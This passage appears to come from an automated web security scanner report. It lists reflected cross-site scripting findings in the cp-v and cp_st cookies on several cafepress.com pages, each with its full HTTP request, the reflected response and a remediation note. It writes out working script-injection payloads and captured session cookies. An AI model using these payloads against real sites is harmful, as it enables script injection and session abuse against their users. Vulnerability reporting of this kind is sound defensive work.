__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59443 Date: Sun, 26 Dec 2010 13:47:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '64dd9</script><script>alert(1)</script>4516792b671 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ipad-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4658a"-alert(1)-"85663dcf2b1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response, in the s.eVar30 assignment shown below: the embedded double quote closes the string literal and the surrounding minus signs keep the statement syntactically valid, so alert(1) is evaluated. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 88289 Date: Sun, 26 Dec 2010 13:46:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88289 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ipad-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da017</script><script>alert(1)</script>5b17e49d25b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response, in the window.cafepress.tealeaf.searchTerm assignment shown below; the payload does not close the quoted string but terminates the script element, since the HTML parser ends a script element at the first </script> regardless of JavaScript string state. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=da017</script><script>alert(1)</script>5b17e49d25b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 88378 Date: Sun, 26 Dec 2010 13:46:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'da017</script><script>alert(1)</script>5b17e49d25b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+iphone-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1695"-alert(1)-"e836931d7c9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response, in the s.eVar30 assignment shown below: the embedded double quote closes the string literal and the surrounding minus signs keep the statement syntactically valid, so alert(1) is evaluated. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 65237 Date: Sun, 26 Dec 2010 13:48:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65237 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+iphone-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b572</script><script>alert(1)</script>4f6addec85e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response, in the window.cafepress.tealeaf.searchTerm assignment shown below; the payload does not close the quoted string but terminates the script element, since the HTML parser ends a script element at the first </script> regardless of JavaScript string state. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4b572</script><script>alert(1)</script>4f6addec85e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 65254 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65254 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '4b572</script><script>alert(1)</script>4f6addec85e ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.42. http://www.cafepress.com/+journals [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+journals
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2b67"-alert(1)-"894c7ad5c8f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response, in the s.eVar30 assignment shown below: the embedded double quote closes the string literal and the surrounding minus signs keep the statement syntactically valid, so alert(1) is evaluated. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+journals HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 59370 Date: Sun, 26 Dec 2010 13:49:10 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/ Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59370 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 